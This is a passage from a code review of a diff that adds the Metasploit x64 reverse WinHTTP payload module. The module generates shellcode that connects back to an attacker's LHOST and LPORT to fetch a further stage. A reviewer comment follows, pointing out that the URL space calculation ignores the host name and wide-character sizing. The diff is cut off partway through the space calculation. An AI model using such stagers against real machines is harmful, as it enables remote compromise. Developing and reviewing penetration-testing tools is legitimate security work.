lib/msf/core/payload/windows/x64/reverse_winhttp.rb

```diff
@@ -0,0 +1,482 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/x64/reverse_http'
+require 'rex/payloads/meterpreter/config'
+
+module Msf
+
+###
+#
+# Complex payload generation for Windows ARCH_X86 that speak HTTP(S) using WinHTTP
+#
+###
+
+module Payload::Windows::ReverseWinHttp_x64
+
+  include Msf::Payload::Windows::ReverseHttp_x64
+
+  #
+  # Generate the first stage
+  #
+  def generate(opts={})
+    conf = {
+      ssl:         opts[:ssl] || false,
+      host:        datastore['LHOST'],
+      port:        datastore['LPORT'],
+      url:         generate_small_uri,
+      retry_count: datastore['StagerRetryCount']
+    }
+
+    # Add extra options if we have enough space
+    unless self.available_space.nil? || required_space > self.available_space
+      conf[:url]              = generate_uri
+      conf[:exitfunk]         = datastore['EXITFUNC']
+      conf[:verify_cert_hash] = opts[:verify_cert_hash]
+      conf[:proxy_host]       = datastore['PayloadProxyHost']
+      conf[:proxy_port]       = datastore['PayloadProxyPort']
+      conf[:proxy_user]       = datastore['PayloadProxyUser']
+      conf[:proxy_pass]       = datastore['PayloadProxyPass']
+      conf[:proxy_type]       = datastore['PayloadProxyType']
+      conf[:retry_count]      = datastore['StagerRetryCount']
+    end
+
+    generate_reverse_winhttp(conf)
+  end
+
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  #
+  # Generate and compile the stager
+  #
+  def generate_reverse_winhttp(opts={})
+    combined_asm = %Q^
+      cld                             ; Clear the direction flag.
+      and rsp, 0xFFFFFFFFFFFFFFF0     ; Ensure RSP is 16 byte aligned 
+      call start                      ; Call start, this pushes the address of 'api_call'
+                                      ; onto the stack.
+      #{asm_block_api}
+      start:
+        pop rbp
+      #{asm_reverse_winhttp(opts)}
+    ^
+    Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
+  end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    # Start with our cached default generated size
+    space = cached_size
+
+    # Add 100 bytes for the encoder to have some room
+    space += 100
+
+    # Make room for the maximum possible URL length
+    space += 256
+
+    # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
+    space += 31
+
+    # The final estimated size
```

Comment:
The max possible URL length is wrong too, AND it doesn't cater for host name, nor the fact that they're `wchar_t`s which are twice the size.